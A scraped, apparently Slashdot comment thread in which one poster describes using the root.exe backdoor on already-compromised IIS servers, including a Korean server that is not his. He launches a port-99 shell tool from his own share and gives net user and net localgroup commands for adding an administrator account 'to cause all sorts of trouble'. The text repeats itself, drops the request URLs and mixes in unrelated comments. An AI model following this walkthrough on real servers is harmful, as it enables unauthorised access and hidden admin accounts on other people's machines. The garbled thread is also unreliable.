In my experience trying to create an Administrator account on a Korean server so that I could term into it and patch it, I noticed that root.exe is not run as administrator. While you can still run commands, they are only being run with the privileges of IUSR_machinename. As best as I can figure out, this is nearly useless, since the IUSR_machinename account has very few priveleges.
What I like to do when testing this is to put ncx99.exe from one of eEye's old IIS exploits on a public share. Then I can go to
By doing so, the server runs this application off of my computer, and then I merely
C:\>telnet localhost 99
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
c:\inetpub\scripts>
From here I have an interactive session with cmd.exe and I can run whatever commands I like. You can see what happens if I try to add a user:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
c:\inetpub\scripts>net user crfix crfix/ADD
System error 5 has occurred.
Access is denied.
c:\inetpub\scripts>
c:\inetpub\scripts>
If you want to test this yourself, just copy c:\winnt\system32\cmd.exe to your c:\InetPub\scripts directory and change root.exe to cmd.exe, or rename cmd.exe to your liking.
If you're curious and somehow do get a shell with administrator privileges, here's how you'd add an account with administrator privileges:
C:\>net user asdf asdf/ADD
The command completed successfully.
C:\>net localgroup Administrators asdf/ADD
The command completed successfully.
From there, you could use Terminal Services to term into that machine and log onto the local domain as user "asdf" with a password of "asdf" and go on to cause all sorts of trouble.
Also, for a kick ass RDP5 compatible Terminal Services client for UNIX, check out http://www.rdesktop.org.
I just finished building a duron system, specifically to run my pirated 2000 server, because I absolutely love the convinience of terminal services. And yes, it is fully patched, and behind a very restrictive ipchains firewall.
If your cousin gets AIDS because the needle he used to shoot up with
heroin was dirty, you blame the government for not providing clean
ones.
Actually, in many parts of the US, it is illegal to buy sterile syringes without a prescription, and that would make it partially the government's fault for being a bunch of fucking idiots. Prohibiting the sale of sterile syringes isn't going to curb intravenous drug use; it is only going to help spread AIDS.
Slashdot Mirror
In my experience trying to create an Administrator account on a Korean server so that I could term into it and patch it, I noticed that root.exe is not run as administrator. While you can still run commands, they are only being run with the privileges of IUSR_machinename. As best as I can figure out, this is nearly useless, since the IUSR_machinename account has very few priveleges.
What I like to do when testing this is to put ncx99.exe from one of eEye's old IIS exploits on a public share. Then I can go to By doing so, the server runs this application off of my computer, and then I merely From here I have an interactive session with cmd.exe and I can run whatever commands I like. You can see what happens if I try to add a user: If you want to test this yourself, just copy c:\winnt\system32\cmd.exe to your c:\InetPub\scripts directory and change root.exe to cmd.exe, or rename cmd.exe to your liking.
If you're curious and somehow do get a shell with administrator privileges, here's how you'd add an account with administrator privileges
From there, you could use Terminal Services to term into that machine and log onto the local domain as user "asdf" with a password of "asdf" and go on to cause all sorts of trouble.
Also, for a kick ass RDP5 compatible Terminal Services client for UNIX, check out http://www.rdesktop.org.
I just finished building a duron system, specifically to run my pirated 2000 server, because I absolutely love the convinience of terminal services. And yes, it is fully patched, and behind a very restrictive ipchains firewall.
Nothing from 192.168.1.0/24 for me here.
I haven't looked in a while, but I believe there are smart cart reader/writers all over eBay for pretty cheap. You might want to check into that.
Yeah, I'm sure that's legal...
The fucker actually works!!
If your cousin gets AIDS because the needle he used to shoot up with heroin was dirty, you blame the government for not providing clean ones.
Actually, in many parts of the US, it is illegal to buy sterile syringes without a prescription, and that would make it partially the government's fault for being a bunch of fucking idiots. Prohibiting the sale of sterile syringes isn't going to curb intravenous drug use; it is only going to help spread AIDS.
...but... isn't there a web site for that? :)
Sir, I kindly ask you to direct me to this site that you speak of.
wh00t!!
i might be mistaken, but i thought it was tsukau.
And then, the RIAA/MPAA/anti-piracy-goons will be able to flood the system with anti-votes for copyrighted material. You just can't win.
last post muthafuckaz!!
Well, its too complicated to be funny. Sorry.
Would someone kindly explain the significance of "029A:7734:029A:7734..." to me? Thank you.